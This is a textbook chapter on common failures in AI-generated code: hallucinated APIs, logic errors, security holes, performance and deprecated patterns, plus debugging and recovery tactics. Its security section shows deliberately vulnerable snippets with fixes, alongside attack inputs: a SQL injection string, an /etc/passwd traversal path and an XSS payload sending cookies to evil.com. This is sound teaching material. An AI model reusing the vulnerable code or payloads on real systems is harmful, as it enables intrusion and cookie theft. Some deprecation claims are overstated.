23 min read

> "The first rule of working with AI-generated code is the same as the first rule of working with any code: it might be wrong." — Adapted from Kernighan's Law

Chapter 14: When AI Gets It Wrong

"The first rule of working with AI-generated code is the same as the first rule of working with any code: it might be wrong." — Adapted from Kernighan's Law


Learning Objectives

By the end of this chapter, you will be able to:

  • Remember the major categories of AI coding failures and recognize examples of each (Bloom's: Remember)
  • Understand why AI models produce hallucinated APIs, subtle logic errors, and security vulnerabilities (Bloom's: Understand)
  • Analyze AI-generated code for common failure patterns including off-by-one errors, race conditions, and performance anti-patterns (Bloom's: Analyze)
  • Evaluate the confidence level of AI-generated code and identify situations where the AI is likely wrong despite sounding certain (Bloom's: Evaluate)
  • Apply systematic debugging approaches specifically designed for AI-generated code (Bloom's: Apply)
  • Create verification workflows that catch AI mistakes before they reach production (Bloom's: Create)

Introduction

Every chapter of this book so far has celebrated what AI coding assistants can do. This chapter is different. This chapter is about what they get wrong — and they get things wrong often.

If you have been following along, you have probably already encountered moments where AI-generated code looked correct, ran without errors on your first test, and then failed spectacularly under real-world conditions. Perhaps a library import referenced a package that does not exist. Perhaps a loop processed one too many or one too few items. Perhaps the code worked perfectly — except it was wide open to SQL injection.

This chapter is not meant to scare you away from AI-assisted development. It is meant to make you better at it. The developers who struggle most with vibe coding are not those who lack programming skill — they are the ones who trust AI output without verification. The developers who thrive are those who have internalized what we call the trust-but-verify mindset: use AI as a powerful collaborator, but always validate its work.

We will build a comprehensive taxonomy of AI coding failures, examine real examples of each failure type, develop systematic debugging strategies, and learn recovery techniques for when a conversation with an AI assistant goes off the rails. By the end, you will have the skills to catch AI mistakes before your users do.

Note

: This chapter builds directly on the code review skills from Chapter 7. If you skipped that chapter, consider reading Section 7.6 (Spotting Potential Issues) before continuing.


14.1 The Taxonomy of AI Coding Failures

Before we dive into specific failure types, it helps to have a map of the territory. AI coding failures fall into several distinct categories, each with different causes, detection difficulty, and potential impact.

The Failure Spectrum

AI coding failures range from immediately obvious to deeply hidden:

Category Detection Difficulty Typical Impact Example
Hallucinated APIs Easy (import fails) Build failure from sklearn.neural import DeepClassifier
Syntax errors Easy (interpreter catches) Build failure Mismatched parentheses, invalid Python
Runtime errors Medium (fails on execution) Crash TypeError from wrong argument types
Logic errors Hard (produces wrong results) Silent data corruption Off-by-one in loop bounds
Security vulnerabilities Hard (works correctly but unsafely) Data breach SQL injection, XSS, hardcoded secrets
Performance anti-patterns Hard (works but slowly) Degraded user experience N+1 queries, blocking I/O
Outdated patterns Medium (may work but deprecated) Technical debt Using removed APIs, old syntax
Architectural issues Very hard (works at small scale) Scalability failure Tight coupling, missing abstractions

Why AI Gets Things Wrong

Understanding why AI makes mistakes helps you predict when it will make them. The root causes include:

Training data mixture. AI models learn from vast corpora of code, which includes both excellent code and terrible code. The model does not inherently know which is which. Code from Stack Overflow answers, tutorials written by beginners, and outdated blog posts all contribute to the training data alongside production-quality code.

Statistical pattern matching. Language models predict the most likely next token based on patterns in training data. When a pattern is common but wrong — such as a frequently repeated security anti-pattern — the model may reproduce it confidently.

Knowledge cutoff. Models have a training data cutoff date. APIs change, libraries release new major versions, and best practices evolve. The model does not know about these changes.

Context limitations. Models work within a limited context window. When your project grows beyond what fits in context, the model may lose track of important constraints, data types, or architectural decisions made earlier.

The completion imperative. AI assistants are trained to be helpful and to provide complete answers. They almost never say "I don't know" or "I'm not sure about this." When the model lacks knowledge, it generates plausible-sounding but incorrect code rather than admitting uncertainty.

Intuition: Think of AI-generated code as a first draft from a junior developer who is very well-read but has never actually run any code in production. They know patterns and conventions, but they have not felt the pain of a 2 AM production incident caused by an unhandled edge case.

The Criticality Matrix

Not all failures are equally dangerous. Use this matrix to prioritize what to verify:

Low Likelihood High Likelihood
High Impact Security vulnerabilities, race conditions Logic errors in business rules
Low Impact Stylistic inconsistencies Verbose or non-idiomatic code

Always verify high-impact areas first, regardless of likelihood. A single SQL injection vulnerability matters more than a hundred stylistic issues.


14.2 Hallucinated APIs and Libraries

The most distinctive failure mode of AI coding assistants is hallucination — generating references to functions, methods, classes, or entire libraries that do not exist. This is not a bug in the traditional sense; the AI has essentially invented an API that seems like it should exist based on naming conventions and patterns in the training data.

What Hallucination Looks Like

Here is an example. You ask an AI assistant to help you with image processing, and it produces:

from PIL import Image
from PIL.Filters import AdaptiveSharpening

def enhance_image(path: str, strength: float = 0.8) -> Image.Image:
    """Enhance image sharpness using adaptive sharpening."""
    img = Image.open(path)
    sharpened = img.filter(AdaptiveSharpening(strength=strength))
    return sharpened

This code looks perfectly reasonable. The PIL library is real. The Image class is real. The coding style is correct. But PIL.Filters.AdaptiveSharpening does not exist. The AI invented it because it sounds like something that should exist in an image processing library. The actual PIL approach would use ImageFilter.SHARPEN or ImageEnhance.Sharpness.

Common Hallucination Patterns

Invented submodules. The AI correctly identifies a real library but invents a submodule within it:

# Hallucinated: requests.async does not exist
from requests.async import AsyncSession

# Real alternatives:
import aiohttp
# or
from httpx import AsyncClient

Non-existent function parameters. The function is real, but the AI adds parameters that do not exist:

# Hallucinated: 'encoding' is not a valid parameter for json.loads
data = json.loads(raw_text, encoding="utf-8")

# Correct (encoding parameter was removed in Python 3.9):
data = json.loads(raw_text)

Plausible method names. The AI generates a method name that follows the library's naming convention but does not actually exist:

# Hallucinated: pandas has no .to_nested_json() method
df.to_nested_json("output.json")

# Real approach:
df.to_json("output.json", orient="records")

Entirely fabricated libraries. Sometimes the AI invents entire packages:

# Hallucinated: this package does not exist
from datavalidator import Schema, validate_strict

# Real alternatives:
from pydantic import BaseModel
# or
from marshmallow import Schema, fields

Common Pitfall: Hallucinated package names are especially dangerous because someone could create a malicious package with that exact name on PyPI. This is called dependency confusion or typosquatting. If you pip install a hallucinated package name, you might actually install malware that someone published under that name. Always verify that a package exists and is legitimate before installing it.

How to Detect Hallucinations

Run the code immediately. The simplest test is to execute the imports. If Python raises an ImportError or ModuleNotFoundError, you have found a hallucination.

Check official documentation. Before using any API the AI suggests, verify it exists in the official documentation. This takes seconds and prevents hours of debugging.

Use your IDE. Modern IDEs with language server support will flag unresolved imports with red underlines before you even run the code.

Search PyPI for packages. If the AI suggests a library you have not heard of, search for it on pypi.org before running pip install.

Verify on the REPL. Open a Python REPL and try:

import some_module
dir(some_module)  # List actual attributes
help(some_module.some_function)  # Check actual signature

Best Practice: Build a habit of verifying every import that an AI suggests if you are not already familiar with the library. This single practice will eliminate the most embarrassing category of AI-generated bugs.


14.3 Subtle Logic Errors

Logic errors are far more dangerous than hallucinated APIs because the code runs without errors — it just produces wrong results. These bugs can persist for months before anyone notices.

Off-by-One Errors

The classic off-by-one error is AI's most frequent logic mistake. Consider this AI-generated function to extract a sublist:

def get_page(items: list, page: int, page_size: int) -> list:
    """Return a page of items from a list."""
    start = page * page_size
    end = start + page_size + 1  # BUG: +1 causes overlap between pages
    return items[start:end]

The bug is on the line computing end. Python slicing already excludes the end index, so adding 1 means each page returns one extra item (overlapping with the next page). The correct version:

def get_page(items: list, page: int, page_size: int) -> list:
    """Return a page of items from a list."""
    start = page * page_size
    end = start + page_size  # Correct: Python slicing is already exclusive
    return items[start:end]

Boundary Condition Errors

AI often fails to handle empty inputs, single-element collections, or maximum values:

def find_median(numbers: list[float]) -> float:
    """Find the median of a list of numbers."""
    sorted_nums = sorted(numbers)
    mid = len(sorted_nums) // 2
    if len(sorted_nums) % 2 == 0:
        return (sorted_nums[mid - 1] + sorted_nums[mid]) / 2
    return sorted_nums[mid]

This code looks correct — and it works for most inputs. But what happens when numbers is empty? sorted_nums becomes [], mid becomes 0, and we get an IndexError. The AI did not add a guard clause:

def find_median(numbers: list[float]) -> float:
    """Find the median of a list of numbers."""
    if not numbers:
        raise ValueError("Cannot compute median of empty list")
    sorted_nums = sorted(numbers)
    mid = len(sorted_nums) // 2
    if len(sorted_nums) % 2 == 0:
        return (sorted_nums[mid - 1] + sorted_nums[mid]) / 2
    return sorted_nums[mid]

Race Conditions

When AI generates concurrent code, race conditions are common because the model focuses on the happy path:

import threading

class Counter:
    """Thread-safe counter."""  # BUG: Not actually thread-safe!

    def __init__(self):
        self.value = 0

    def increment(self):
        self.value += 1  # Race condition: read-modify-write is not atomic

    def get(self) -> int:
        return self.value

The docstring says "thread-safe" but the implementation is not. The += operation involves reading the current value, adding one, and writing back — three steps that can be interleaved between threads. The fix:

import threading

class Counter:
    """Thread-safe counter using a lock."""

    def __init__(self):
        self.value = 0
        self._lock = threading.Lock()

    def increment(self):
        with self._lock:
            self.value += 1

    def get(self) -> int:
        with self._lock:
            return self.value

Incorrect Algorithm Implementation

Sometimes AI produces code that almost implements the right algorithm but has a subtle flaw:

def binary_search(arr: list[int], target: int) -> int:
    """Return index of target in sorted array, or -1 if not found."""
    low, high = 0, len(arr) - 1
    while low <= high:
        mid = (low + high) // 2  # Potential integer overflow in other languages
        if arr[mid] == target:
            return mid
        elif arr[mid] < target:
            low = mid  # BUG: should be mid + 1
        else:
            high = mid  # BUG: should be mid - 1
    return -1

This binary search can enter an infinite loop. When arr[mid] < target, setting low = mid (instead of mid + 1) means that if low and high are adjacent, mid will equal low forever. The corrected version uses low = mid + 1 and high = mid - 1.

Real-World Application: In production systems, subtle logic errors in data processing pipelines can corrupt millions of records before anyone notices. One real-world example involved an AI-generated ETL (Extract, Transform, Load) script that had an off-by-one error in date range filtering. It skipped the first day of every month, leading to systematic data loss that was not caught for three weeks.

Incorrect Regular Expressions

AI frequently generates regex patterns that are close but not quite right:

import re

def validate_email(email: str) -> bool:
    """Validate an email address."""
    pattern = r'^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$'
    return bool(re.match(pattern, email))

This pattern looks reasonable but rejects valid emails with characters like !, #, or ' in the local part (which are technically allowed by RFC 5321). It also accepts user@.com (domain starting with a dot) and user@com..example (consecutive dots in domain). Email validation is notoriously hard, and AI tends to produce the "common but wrong" regex from countless Stack Overflow answers.

Common Pitfall: Be especially suspicious of AI-generated regular expressions. They frequently handle the common cases correctly while failing on edge cases. Always test regex patterns with a comprehensive set of both valid and invalid inputs, including edge cases.


14.4 Security Vulnerabilities in AI Code

Security vulnerabilities in AI-generated code deserve special attention because they are simultaneously common, hard to detect, and potentially catastrophic. The model has seen millions of examples of insecure code patterns — and it reproduces them faithfully.

SQL Injection

The most classic web vulnerability, and AI generates it routinely:

def get_user(username: str) -> dict:
    """Fetch user from database."""
    query = f"SELECT * FROM users WHERE username = '{username}'"  # VULNERABLE
    cursor.execute(query)
    return cursor.fetchone()

If username is ' OR '1'='1' --, this query returns all users. The fix is parameterized queries:

def get_user(username: str) -> dict:
    """Fetch user from database."""
    query = "SELECT * FROM users WHERE username = %s"  # Safe: parameterized
    cursor.execute(query, (username,))
    return cursor.fetchone()

Common Pitfall: AI assistants will sometimes generate parameterized queries in some functions and string-concatenated queries in others within the same codebase. Inconsistency is the enemy of security. Review every database query, not just the ones that look suspicious.

Cross-Site Scripting (XSS)

When generating web code, AI often fails to escape user input:

from flask import Flask, request

app = Flask(__name__)

@app.route('/search')
def search():
    query = request.args.get('q', '')
    # VULNERABLE: user input directly in HTML
    return f"<h1>Search results for: {query}</h1>"

An attacker can inject <script>document.location='http://evil.com/steal?c='+document.cookie</script> as the query parameter. The fix uses proper escaping:

from flask import Flask, request
from markupsafe import escape

app = Flask(__name__)

@app.route('/search')
def search():
    query = request.args.get('q', '')
    return f"<h1>Search results for: {escape(query)}</h1>"  # Safe: escaped

Hardcoded Secrets

AI assistants frequently generate code with placeholder secrets that look like they should be replaced but sometimes are not:

import jwt

SECRET_KEY = "super-secret-key-change-me"  # VULNERABLE: hardcoded secret

def create_token(user_id: int) -> str:
    return jwt.encode({"user_id": user_id}, SECRET_KEY, algorithm="HS256")

The fix uses environment variables:

import os
import jwt

SECRET_KEY = os.environ["JWT_SECRET_KEY"]  # Safe: from environment

def create_token(user_id: int) -> str:
    return jwt.encode({"user_id": user_id}, SECRET_KEY, algorithm="HS256")

Path Traversal

AI-generated file-handling code often fails to validate paths:

from flask import Flask, send_file, request

app = Flask(__name__)

@app.route('/download')
def download():
    filename = request.args.get('file')
    # VULNERABLE: allows ../../etc/passwd
    return send_file(f'/uploads/{filename}')

The fix validates the resolved path:

import os
from pathlib import Path
from flask import Flask, send_file, request, abort

app = Flask(__name__)
UPLOAD_DIR = Path('/uploads').resolve()

@app.route('/download')
def download():
    filename = request.args.get('file')
    if not filename:
        abort(400)
    file_path = (UPLOAD_DIR / filename).resolve()
    if not str(file_path).startswith(str(UPLOAD_DIR)):
        abort(403)  # Path traversal attempt
    if not file_path.is_file():
        abort(404)
    return send_file(file_path)

Insecure Deserialization

AI sometimes suggests pickle for data serialization without warning about the dangers:

import pickle

def load_user_data(data_bytes: bytes) -> dict:
    """Load user-submitted data."""
    return pickle.loads(data_bytes)  # VULNERABLE: arbitrary code execution

Using pickle.loads on untrusted data allows arbitrary code execution. If the data comes from a user or external source, use json instead:

import json

def load_user_data(data_bytes: bytes) -> dict:
    """Load user-submitted data."""
    return json.loads(data_bytes)  # Safe: JSON cannot execute code

Weak Cryptography

AI models sometimes suggest outdated or weak cryptographic algorithms:

import hashlib

def hash_password(password: str) -> str:
    """Hash a password for storage."""
    return hashlib.md5(password.encode()).hexdigest()  # VULNERABLE: MD5 is broken

MD5 is cryptographically broken and unsuitable for password hashing. Even SHA-256 alone is not appropriate for passwords (it is too fast). The correct approach uses a purpose-built password hashing function:

import bcrypt

def hash_password(password: str) -> bytes:
    """Hash a password for storage using bcrypt."""
    return bcrypt.hashpw(password.encode(), bcrypt.gensalt())

def verify_password(password: str, hashed: bytes) -> bool:
    """Verify a password against its hash."""
    return bcrypt.checkpw(password.encode(), hashed)

Best Practice: For security-critical code, never accept AI output at face value. Cross-reference against the OWASP Top 10 (owasp.org/www-project-top-ten) and use security-focused static analysis tools like bandit for Python. The few minutes this takes can prevent catastrophic breaches.


14.5 Performance Anti-Patterns

AI-generated code often prioritizes readability and correctness over performance. While this is usually the right trade-off for prototypes, it can create serious problems in production systems.

The N+1 Query Problem

This is the most common performance anti-pattern in AI-generated database code:

def get_all_orders_with_customers(db_session):
    """Get all orders with customer details."""
    orders = db_session.query(Order).all()  # 1 query
    result = []
    for order in orders:
        customer = db_session.query(Customer).get(order.customer_id)  # N queries
        result.append({
            "order_id": order.id,
            "total": order.total,
            "customer_name": customer.name
        })
    return result

For 1,000 orders, this executes 1,001 database queries. The fix uses a JOIN or eager loading:

def get_all_orders_with_customers(db_session):
    """Get all orders with customer details using a JOIN."""
    results = (
        db_session.query(Order, Customer)
        .join(Customer, Order.customer_id == Customer.id)
        .all()
    )
    return [
        {
            "order_id": order.id,
            "total": order.total,
            "customer_name": customer.name
        }
        for order, customer in results
    ]

Unnecessary Data Copying

AI frequently generates code that copies data structures unnecessarily:

def process_large_dataset(data: list[dict]) -> list[dict]:
    """Process and filter a large dataset."""
    # Unnecessary copy: sorted() creates a new list
    sorted_data = sorted(data, key=lambda x: x['timestamp'])
    # Another copy: list comprehension creates another new list
    filtered = [item for item in sorted_data if item['status'] == 'active']
    # Yet another copy: another list comprehension
    result = [
        {**item, 'processed': True}
        for item in filtered
    ]
    return result

For a dataset of millions of records, this creates three full copies. A more memory-efficient approach uses generators:

def process_large_dataset(data: list[dict]) -> list[dict]:
    """Process and filter a large dataset efficiently."""
    data.sort(key=lambda x: x['timestamp'])  # In-place sort
    return [
        {**item, 'processed': True}
        for item in data
        if item['status'] == 'active'
    ]

Blocking I/O in Async Code

AI sometimes mixes synchronous and asynchronous patterns:

import asyncio
import requests  # Synchronous library!

async def fetch_all_urls(urls: list[str]) -> list[str]:
    """Fetch all URLs concurrently."""
    results = []
    for url in urls:
        # BUG: requests.get is blocking, defeats the purpose of async
        response = requests.get(url)
        results.append(response.text)
    return results

This code uses async but makes blocking HTTP calls, so nothing actually runs concurrently. The fix uses an async HTTP library:

import asyncio
import aiohttp

async def fetch_all_urls(urls: list[str]) -> list[str]:
    """Fetch all URLs concurrently."""
    async with aiohttp.ClientSession() as session:
        tasks = [fetch_one(session, url) for url in urls]
        return await asyncio.gather(*tasks)

async def fetch_one(session: aiohttp.ClientSession, url: str) -> str:
    """Fetch a single URL."""
    async with session.get(url) as response:
        return await response.text()

Quadratic Algorithms Hidden in Clean Code

Sometimes AI generates beautifully readable code that hides O(n^2) complexity:

def find_duplicates(items: list[str]) -> list[str]:
    """Find duplicate items in a list."""
    duplicates = []
    for item in items:
        if items.count(item) > 1 and item not in duplicates:  # O(n) * 2 per iteration
            duplicates.append(item)
    return duplicates

The items.count() call is O(n) and item not in duplicates is also O(n), making this O(n^2). For a list of 100,000 items, this becomes unusably slow. The fix uses a set:

from collections import Counter

def find_duplicates(items: list[str]) -> list[str]:
    """Find duplicate items in a list."""
    counts = Counter(items)  # O(n)
    return [item for item, count in counts.items() if count > 1]  # O(n)

Advanced: When reviewing AI-generated code for performance, mentally trace the time complexity of each line. Look for nested loops, .count() calls inside loops, in checks on lists (O(n)) versus sets (O(1)), and string concatenation in loops (which creates a new string each iteration).


14.6 Outdated Patterns and Deprecated APIs

AI models are trained on historical data, which means they sometimes suggest patterns that were appropriate years ago but are now outdated or deprecated.

Python 2 Remnants

Even though Python 2 reached end-of-life in January 2020, AI occasionally generates Python 2 patterns:

# Outdated: Python 2 style print statement
print "Hello, world"

# Outdated: Python 2 style string formatting
message = "Hello, %s. You are %d years old." % (name, age)

# Outdated: Python 2 style exception handling
try:
    risky_operation()
except Exception, e:
    print e

# Outdated: inheriting from object explicitly (unnecessary in Python 3)
class MyClass(object):
    pass

The modern Python 3 equivalents:

print("Hello, world")
message = f"Hello, {name}. You are {age} years old."

try:
    risky_operation()
except Exception as e:
    print(e)

class MyClass:
    pass

Deprecated Standard Library Usage

# Deprecated: asyncio.get_event_loop() in Python 3.10+
loop = asyncio.get_event_loop()
loop.run_until_complete(main())

# Modern:
asyncio.run(main())

# Deprecated: using typing.List, typing.Dict in Python 3.9+
from typing import List, Dict
def process(items: List[Dict[str, int]]) -> List[str]:
    pass

# Modern: use built-in types directly
def process(items: list[dict[str, int]]) -> list[str]:
    pass

# Deprecated: os.path for path manipulation
import os
path = os.path.join(base_dir, "data", "file.txt")
exists = os.path.exists(path)

# Modern: pathlib
from pathlib import Path
path = Path(base_dir) / "data" / "file.txt"
exists = path.exists()

Framework-Specific Deprecations

AI often suggests deprecated patterns from popular frameworks:

# Deprecated Flask pattern (before Flask 2.0)
@app.route('/users', methods=['GET'])
def get_users():
    pass

@app.route('/users', methods=['POST'])
def create_user():
    pass

# Modern Flask (2.0+)
@app.get('/users')
def get_users():
    pass

@app.post('/users')
def create_user():
    pass
# Deprecated SQLAlchemy 1.x query style
users = session.query(User).filter(User.age > 18).all()

# Modern SQLAlchemy 2.x style
from sqlalchemy import select
stmt = select(User).where(User.age > 18)
users = session.execute(stmt).scalars().all()

Best Practice: When an AI suggests a library pattern you are not sure about, check the library's changelog or migration guide. Search for phrases like "[library name] deprecation warnings" or "[library name] migration guide" to quickly identify whether the suggested pattern is current.

Detecting Outdated Patterns

Python's warning system can help catch deprecated usage:

import warnings
warnings.filterwarnings('error', category=DeprecationWarning)

This converts deprecation warnings into errors, making them impossible to ignore during testing. You can also use tools like pyupgrade to automatically modernize Python syntax.


14.7 The Confidence Problem: When AI Sounds Right but Isn't

Perhaps the most insidious aspect of AI coding failures is the confidence problem. AI assistants present incorrect code with the same confident tone as correct code. There is no "I'm not sure" disclaimer, no wavering, no hedge. This makes it psychologically difficult to question AI-generated output.

Why AI Never Says "I Don't Know"

Language models generate text token by token, predicting the most probable next token based on context. They do not have an internal mechanism for evaluating their own uncertainty. The model does not think, "I'm 40% confident in this function" — it simply generates the most likely completion given the prompt.

This means:

  • Completely fabricated APIs are described as if they are standard library features
  • Incorrect algorithm implementations come with detailed, accurate-sounding docstrings
  • Security anti-patterns are presented alongside correct code with no distinction
  • Made-up configuration options are suggested with plausible-sounding explanations

The Expertise Illusion

AI-generated code often reads like it was written by an expert. The variable names are well-chosen, the docstrings are thorough, the code style is clean. This creates an expertise illusion where the superficial quality of the code masks substantive errors.

Consider this example:

def calculate_compound_interest(
    principal: float,
    annual_rate: float,
    years: int,
    compounding_frequency: int = 12
) -> float:
    """
    Calculate compound interest using the standard formula.

    A = P(1 + r/n)^(nt)

    Args:
        principal: Initial investment amount
        annual_rate: Annual interest rate as a decimal (e.g., 0.05 for 5%)
        years: Number of years
        compounding_frequency: Times interest is compounded per year

    Returns:
        Final amount after compound interest
    """
    amount = principal * (1 + annual_rate / compounding_frequency) ** (
        compounding_frequency * years
    )
    return round(amount, 2)

This looks flawless. The docstring is thorough, the type hints are correct, the formula is clearly documented. But what if the caller passes annual_rate=5 (meaning 5%) instead of annual_rate=0.05? The function will silently return an astronomically wrong result. An experienced developer would add validation:

if annual_rate > 1:
    raise ValueError(
        f"annual_rate={annual_rate} seems too high. "
        f"Did you mean {annual_rate / 100}? Pass rate as a decimal (0.05 for 5%)."
    )

The AI's polished presentation made it easy to skip critical review.

Signals That AI Might Be Wrong

While AI does not flag its own uncertainty, there are signals you can watch for:

Overly specific details on obscure topics. If the AI provides very detailed configuration for a niche library or platform, verify every option. AI is most likely to hallucinate when the topic has limited representation in training data.

Inconsistency within the same response. If the AI uses one approach in one function and a contradictory approach in another, at least one is wrong.

Suspiciously convenient solutions. If a complex problem is solved with a single function call to an API you have never heard of, verify that the API exists.

Solutions that avoid the hard part. If the AI's solution to a complex problem seems too simple, it may have glossed over essential complexity (error handling, edge cases, concurrency control).

Code that matches common but wrong patterns. Patterns that appear frequently in tutorials and Stack Overflow answers (like using MD5 for passwords or string formatting for SQL) are exactly what AI reproduces most confidently.

Intuition: Develop a "that's too easy" instinct. When a genuinely hard problem gets a clean, short solution from the AI, that is your signal to verify extra carefully. Hard problems usually require hard solutions, and if the code seems too neat, important complexity may be missing.


14.8 Debugging AI-Generated Code Systematically

Debugging AI-generated code requires a different approach than debugging code you wrote yourself. You did not write it, so you lack the mental model of how it is supposed to work. You need to build that mental model before you can find the bugs.

The VERIFY Framework

Use this systematic framework when reviewing AI-generated code:

V — Validate imports. Check that every imported module and name actually exists. Run the imports in a REPL.

E — Examine edge cases. Test with empty inputs, single elements, maximum values, None/null values, and negative numbers.

R — Review security. Check for SQL injection, XSS, hardcoded secrets, path traversal, insecure deserialization, and weak cryptography.

I — Inspect logic. Trace through the code mentally with concrete values. Pay special attention to loop bounds, comparison operators (< vs <=, > vs >=), and return values.

F — Find performance issues. Look for nested loops, queries inside loops, unnecessary copying, and blocking operations in async code.

Y — Yell about types. Check that types match expectations throughout the data flow. A function that receives a string when it expects an integer will fail silently or produce wrong results.

Practical Debugging Techniques

Add assertion statements. Before and after AI-generated code blocks, add assertions that verify your expectations:

def process_orders(orders: list[dict]) -> list[dict]:
    assert all(isinstance(o, dict) for o in orders), "All orders must be dicts"
    assert all('id' in o for o in orders), "All orders must have 'id'"

    result = ai_generated_processing_logic(orders)

    assert len(result) <= len(orders), "Should not create more orders than input"
    assert all('total' in r for r in result), "All results must have 'total'"
    return result

Use print debugging strategically. When you cannot understand what AI-generated code is doing, add print statements at key points:

def mystery_function(data):
    print(f"Input: {data[:3]}... (length={len(data)})")  # Sample first 3

    intermediate = step_one(data)
    print(f"After step_one: {type(intermediate)}, length={len(intermediate)}")

    result = step_two(intermediate)
    print(f"After step_two: {type(result)}, first_item={result[0] if result else 'EMPTY'}")

    return result

Write targeted test cases. Create tests that specifically probe the areas where AI is likely to fail:

def test_pagination_edge_cases():
    """Test AI-generated pagination with tricky inputs."""
    items = list(range(10))

    # Normal case
    assert get_page(items, 0, 3) == [0, 1, 2]
    assert get_page(items, 1, 3) == [3, 4, 5]

    # Edge cases AI often gets wrong
    assert get_page(items, 3, 3) == [9]      # Last partial page
    assert get_page(items, 4, 3) == []        # Beyond last page
    assert get_page([], 0, 3) == []            # Empty list
    assert get_page(items, 0, 100) == items    # Page size > list size

Use a debugger. For complex AI-generated code, step through it in a debugger rather than trying to understand it by reading alone:

# Add this line before the suspicious code
import pdb; pdb.set_trace()

Or use VS Code's built-in debugger with breakpoints.

Best Practice: When debugging AI-generated code, resist the urge to fix the code before you understand it. First build a complete mental model of what the code does (right and wrong). Then fix it. If you patch symptoms without understanding, you will introduce new bugs.

Type Checking as a Debugging Tool

Static type checking catches many AI errors before runtime:

# Install mypy: pip install mypy
# Run: mypy your_file.py

AI-generated code often has type inconsistencies that mypy catches:

def get_user_age(user: dict) -> int:
    return user.get('age')  # mypy error: returns Optional[int], not int

Using Linters Effectively

Configure your linter to catch common AI mistakes:

# .flake8 configuration
[flake8]
max-complexity = 10
select = E,W,F,C90

Tools like pylint, ruff, and flake8 catch issues that are invisible to the eye but obvious to static analysis.


14.9 Recovery Strategies and Conversation Repair

Sometimes an AI conversation goes so far off track that individual bug fixes are not enough. You need strategies for recovering the conversation — getting the AI back on a productive path.

Recognizing a Derailed Conversation

Signs that your AI conversation has gone off the rails:

  • Circular fixes: You report a bug, the AI "fixes" it but introduces a new bug, you report that, and the cycle repeats.
  • Contradictory approaches: The AI switches between fundamentally different architectural approaches across responses.
  • Increasing complexity: Each "fix" makes the code more complex rather than simpler.
  • Losing context: The AI forgets constraints or requirements you specified earlier.
  • Cargo cult fixes: The AI makes changes that look relevant but do not actually address the problem.

The Nuclear Option: Start Fresh

Sometimes the best recovery strategy is to start a new conversation. This is especially appropriate when:

  • The context window is heavily polluted with failed attempts
  • The AI has adopted a fundamentally wrong architecture
  • More than three rounds of fixes have failed to resolve the issue

When starting fresh, include in your new prompt:

  1. A clear description of what you are building
  2. The specific constraints and requirements
  3. What approach you tried before and why it failed
  4. The specific behavior you need
I'm building a pagination function for a REST API. My previous
attempt had off-by-one errors in the page boundaries.

Requirements:
- Pages are 0-indexed (first page is page 0)
- page_size items per page
- Last page may have fewer than page_size items
- Requesting beyond the last page returns empty list
- Empty input returns empty list for any page

Please generate the function with comprehensive edge case handling.

The Targeted Reprompt

Instead of starting completely fresh, you can give the AI a very targeted correction:

Stop. The current approach of building the SQL query with string
concatenation is fundamentally insecure. Let's start the database
layer over using parameterized queries only. Do not use f-strings
or string formatting for any SQL query. Use placeholders (%s for
MySQL, ? for SQLite, $1 for PostgreSQL) in every query.

Key elements of an effective targeted reprompt: - Clear stop signal: "Stop" or "Let's start over on this part" - Identification of the fundamental problem: Not just the symptom, but the root cause - Explicit constraint: What the new approach must do differently - Specific enough to prevent repetition: Do not leave room for the AI to drift back to the old pattern

The Incremental Rollback

If the AI's code was mostly correct before a recent "fix" broke it, roll back to the last known good state:

The code was working correctly before the last change. Let's go
back to the version that used a simple for loop instead of the
recursive approach. Here is the working version:

[paste the working code]

Now, starting from this working version, let's fix ONLY the issue
where it doesn't handle empty lists. Do not change anything else.

The Constraint Fence

When the AI keeps making the same type of mistake, add explicit constraints:

Generate the data processing function with these constraints:
1. NO nested loops (time complexity must be O(n) or O(n log n))
2. NO string concatenation for building queries
3. ALL database calls must use parameterized queries
4. EVERY function must handle empty input gracefully
5. NO global state or module-level variables

Violating any of these constraints means the code is wrong.
Please check each constraint before finalizing.

Real-World Application: Experienced vibe coders report that the most productive conversations follow a pattern: start with a clear specification (Chapter 10), generate code, review carefully (Chapter 7), and if problems are found, use targeted reprompts rather than trying to fix everything incrementally. The "three strikes" rule is common: if three rounds of fixes do not resolve the issue, start a fresh conversation.

Saving Good Code Before Experimenting

Before asking the AI to make significant changes to working code, save the current version:

# Save to a file, copy to clipboard, or commit to git
git add . && git commit -m "Working version before AI refactor attempt"

This gives you a rollback point if the AI's changes make things worse. Version control is your best friend when doing iterative AI-assisted development (see Chapter 31 for detailed version control workflows).


14.10 Building Resilience: The Trust-but-Verify Mindset

The final and most important lesson of this chapter is attitudinal. The developers who are most effective with AI coding assistants share a common mindset: they trust the AI enough to use it extensively, but they verify its output rigorously.

The Trust Spectrum

Developers typically fall somewhere on this spectrum:

Blind trust (dangerous): Accepts all AI output without review. Copies code directly into production. Does not test edge cases. This developer will eventually have a serious incident.

Healthy skepticism (ideal): Uses AI extensively to accelerate development. Reviews every piece of generated code. Tests edge cases and security. Verifies imports and APIs. Treats AI output as a strong first draft that needs review.

Excessive distrust (unproductive): Second-guesses everything. Rewrites most AI output from scratch. Spends more time verifying than the code would take to write manually. Loses the productivity benefits of AI assistance.

The goal is to land in the middle — healthy skepticism. Use AI freely and confidently, but build verification into your workflow as a non-negotiable step.

The Verification Checklist

Build a personal verification checklist and use it consistently. Here is a starter template:

## AI Code Verification Checklist

### Imports and Dependencies
- [ ] All imports resolve to real modules
- [ ] Library versions are compatible
- [ ] No unnecessary dependencies added

### Logic
- [ ] Works with empty input
- [ ] Works with single-element input
- [ ] Works with maximum/boundary values
- [ ] Loop bounds are correct (no off-by-one)
- [ ] Comparison operators are correct (<= vs <)

### Security
- [ ] No SQL injection (all queries parameterized)
- [ ] No XSS (all user input escaped)
- [ ] No hardcoded secrets
- [ ] No path traversal vulnerabilities
- [ ] No insecure deserialization

### Performance
- [ ] No N+1 query patterns
- [ ] No quadratic algorithms on large inputs
- [ ] No blocking I/O in async code
- [ ] No unnecessary data copying

### Style and Maintenance
- [ ] Code matches project conventions
- [ ] No deprecated APIs or patterns
- [ ] Error messages are helpful
- [ ] Type hints are accurate

Automated Verification

Automate as much of the verification as possible. Set up your project with:

  1. Type checking (mypy or pyright) to catch type errors
  2. Linting (ruff, flake8, or pylint) to catch style and logic issues
  3. Security scanning (bandit) to catch common vulnerabilities
  4. Import checking to verify all imports resolve
  5. Tests (especially edge case tests) to catch logic errors
  6. Pre-commit hooks to run all of the above before every commit
# .pre-commit-config.yaml
repos:
  - repo: https://github.com/astral-sh/ruff-pre-commit
    rev: v0.4.0
    hooks:
      - id: ruff
        args: [--fix]
